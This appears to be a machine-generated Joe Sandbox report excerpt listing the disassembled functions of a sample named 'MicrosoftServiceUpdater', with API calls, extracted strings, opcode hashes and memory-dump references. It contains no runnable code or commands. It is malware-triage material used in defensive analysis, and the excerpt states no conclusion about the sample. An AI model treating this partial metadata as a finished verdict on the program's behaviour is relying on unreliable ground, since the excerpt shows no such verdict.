                                                                                                                                                                                          • Opcode ID: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                                                                                                                                                                                          • Instruction ID: 6236a9dd4f16947a02bcba69e74b67fd587de4f4a9f6f064fb5c01932986745a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 99415E31A0C64286FB129B60E855B75EBA0FF8AB45F45A175C90E82791DFBFE044EA00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                                          • API String ID: 2829607268-3733053543
                                                                                                                                                                                          • Opcode ID: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
                                                                                                                                                                                          • Instruction ID: b13a4d78943d4662e32636e08afa8f2704d87fbdac1b5958e53bf301cc85c277
                                                                                                                                                                                          • Opcode Fuzzy Hash: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0219E72A1CA4287F7518B21E445B7AFBA0FB89745F40A135DB4E82B98DFBFD4449B00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                                                                                                          • String ID: $one
                                                                                                                                                                                          • API String ID: 2654313074-2912862099
                                                                                                                                                                                          • Opcode ID: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                                                                                                                                                                                          • Instruction ID: 382fe2b16cb280b059c1cd6836d6b4b63db10d63d2bdc3f55adf82c728e3a9f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                                                                                                                                                                                          • Instruction Fuzzy Hash: AD518331E0CA4286F7528B11E844A79EBA1FF8AB95F54A231C91D837E4CFBF9445E701
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                          • String ID: "$:$RegServer
                                                                                                                                                                                          • API String ID: 1203814774-766454958
                                                                                                                                                                                          • Opcode ID: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
                                                                                                                                                                                          • Instruction ID: 2cc6b705fe25a41417550d16821cf4e283d37553b89dccf108d3bfd4a43a640e
                                                                                                                                                                                          • Opcode Fuzzy Hash: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9402D361E0C68245FA638B24A45CEB9EBB1EF42780F583575C95E867D5CEBFE402E700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF636343723), ref: 00007FF636344B9A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF636343723), ref: 00007FF636344BBE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF636343723), ref: 00007FF636344BDE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF636343723), ref: 00007FF636344C05
                                                                                                                                                                                          • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF636343723), ref: 00007FF636344C36
                                                                                                                                                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF636343723), ref: 00007FF636344C54
                                                                                                                                                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF636343723), ref: 00007FF636344C6E
                                                                                                                                                                                          • FreeLibrary.KERNEL32 ref: 00007FF636344D50
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF636343723), ref: 00007FF636344D6C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                          • API String ID: 1865808269-1731843650
                                                                                                                                                                                          • Opcode ID: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                                                                                                                                                                                          • Instruction ID: 792626afcf4b8d60d269955f75bdfa8df1cfa7537941781cc4c4a3cbb8041346
                                                                                                                                                                                          • Opcode Fuzzy Hash: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E517022A0DB8186FB528B11A810979FBA0FF8AB90F446175CA4E87795DFBFE405D710
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                          • API String ID: 229715263-2428544900
                                                                                                                                                                                          • Opcode ID: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                                                                                                                          • Instruction ID: 2af6d7e307780e14573b857e88cb5e02c6d6661581578d26a44d263f2b993a31
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: B2517F3261C68186FB528B10E4446BEFBA0FB8AB81F54A131DA4E93795DFBFD845D700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                                                                                          • String ID: one$rce.
                                                                                                                                                                                          • API String ID: 2929476258-2497954472
                                                                                                                                                                                          • Opcode ID: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                                                                                                                          • Instruction ID: 2229a9060094bc6f148a4534f412f226827355ef06510bb000c9b6a67bcc2e0d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89719021E0D78686FA528F25A800BB9AB90AF55BA8F046230DE5D877D1DFBFE445D700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                          • String ID: one
                                                                                                                                                                                          • API String ID: 3785188418-2053932785
                                                                                                                                                                                          • Opcode ID: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                                                                                                                          • Instruction ID: 339c5b2394d90fbdf3a5faf99e56ec36dbd376c67737c4e92d736845d342d15a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2631433090864386FA525B25F804AB4FB51FB8AB51F94B270C91E873D4DFBFA049E701
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2168512254-0
                                                                                                                                                                                          • Opcode ID: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                                                                                                                                                                                          • Instruction ID: 66b4bc514dd0b2b04acbd7f954f8fde9bf49a33a853d9fe7e9f45cb415554e05
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16511D32608A81CAF7218F21E494AB9BBA4FB4DB89F416135DA0E93754DF7BE445DB00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                          • API String ID: 3346862599-1109908249
                                                                                                                                                                                          • Opcode ID: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                                                                                                                          • Instruction ID: 4aeab362756f025972ae3265a54ccc15f1bc7eea153364b14f9b6c65865d3e99
                                                                                                                                                                                          • Opcode Fuzzy Hash: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                                                                                                                          • Instruction Fuzzy Hash: F151C132A0CA418AFB118B21E440ABDF7A4FB89B50F456132DA5D83794DFBFE544DB04
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                          • API String ID: 4204503880-1888249752
                                                                                                                                                                                          • Opcode ID: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                                                                                                                          • Instruction ID: 4b172abeaba926aac5ae9a2d54c192068ba08a10736858a5a7805e1247db7642
                                                                                                                                                                                          • Opcode Fuzzy Hash: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A31283260CB458AF6518F16F4445AAFBA0FB89B90F456139EE4E83754DF7EE405CB00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 975904313-0
                                                                                                                                                                                          • Opcode ID: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                                                                                                                          • Instruction ID: 96d482df6cb283510cdbb09f764c1e107207c5c70ac22466a42c2e97ff3a9c9f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3671A051A0C6C585FF638F2494107B8EB90AF4AB90F486171CA9E963D5CEBFE845D314
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2156179360-0
                                                                                                                                                                                          • Opcode ID: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                                                                                                                          • Instruction ID: f06bba9792b9624c90b6fc9dd19821268b7b7d3965d8ffa6ce190f06781baa6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC617072A0C6428AFB618F1595049BCBBA1FF04794F14A531DE0DA3794DFBBE881E744
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2212493051-0
                                                                                                                                                                                          • Opcode ID: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                                                                                                                          • Instruction ID: fd5e42193aace25e7c8022351397d889e93a4d3fefa6fd172eff5087e9053d89
                                                                                                                                                                                          • Opcode Fuzzy Hash: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C318D36B246418AF711CB75E844ABDBBA0F749B99F596130CE0A93B48CF7EE4458B00
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FindResourceA.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345220
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: SizeofResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345231
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FindResourceA.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345257
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: LoadResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345268
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: LockResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345277
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: memcpy_s.MSVCRT ref: 00007FF636345296
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FreeResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF6363452A5
                                                                                                                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF636343261), ref: 00007FF636344085
                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00007FF636344108
                                                                                                                                                                                            • Part of subcall function 00007FF636344F2C: LoadStringA.USER32 ref: 00007FF636344FBC
                                                                                                                                                                                            • Part of subcall function 00007FF636344F2C: MessageBoxA.USER32 ref: 00007FF636344FFC
                                                                                                                                                                                            • Part of subcall function 00007FF636347958: GetLastError.KERNEL32 ref: 00007FF63634795C
                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF636343261), ref: 00007FF63634412E
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00007FF636343261), ref: 00007FF63634418F
                                                                                                                                                                                            • Part of subcall function 00007FF636347D28: FindResourceA.KERNEL32 ref: 00007FF636347D52
                                                                                                                                                                                            • Part of subcall function 00007FF636347D28: LoadResource.KERNEL32 ref: 00007FF636347D69
                                                                                                                                                                                            • Part of subcall function 00007FF636347D28: DialogBoxIndirectParamA.USER32 ref: 00007FF636347D9F
                                                                                                                                                                                            • Part of subcall function 00007FF636347D28: FreeResource.KERNEL32 ref: 00007FF636347DB1
                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00007FF636344168
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                          • String ID: <None>$LICENSE
                                                                                                                                                                                          • API String ID: 2414642746-383193767
                                                                                                                                                                                          • Opcode ID: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                                                                                                                          • Instruction ID: 2d0a759a67da26cf2b0d24c6f9ef200600e5537f12fe64b1c5f2fdee6df7d8bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c43a6c209edff215d2b42a35ca82b93fc35595726ea4f293da311bf4292f90f
                                                                                                                                                                                          • Instruction Fuzzy Hash: C0313332A1960686F7229B20E854B79E7A0FF99749F41A535C90DC6791EFBFE004AB00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF63634625F), ref: 00007FF6363479BB
                                                                                                                                                                                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF63634625F), ref: 00007FF6363479CA
                                                                                                                                                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF63634625F), ref: 00007FF636347A1A
                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF63634625F), ref: 00007FF636347A4E
                                                                                                                                                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF63634625F), ref: 00007FF636347A67
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
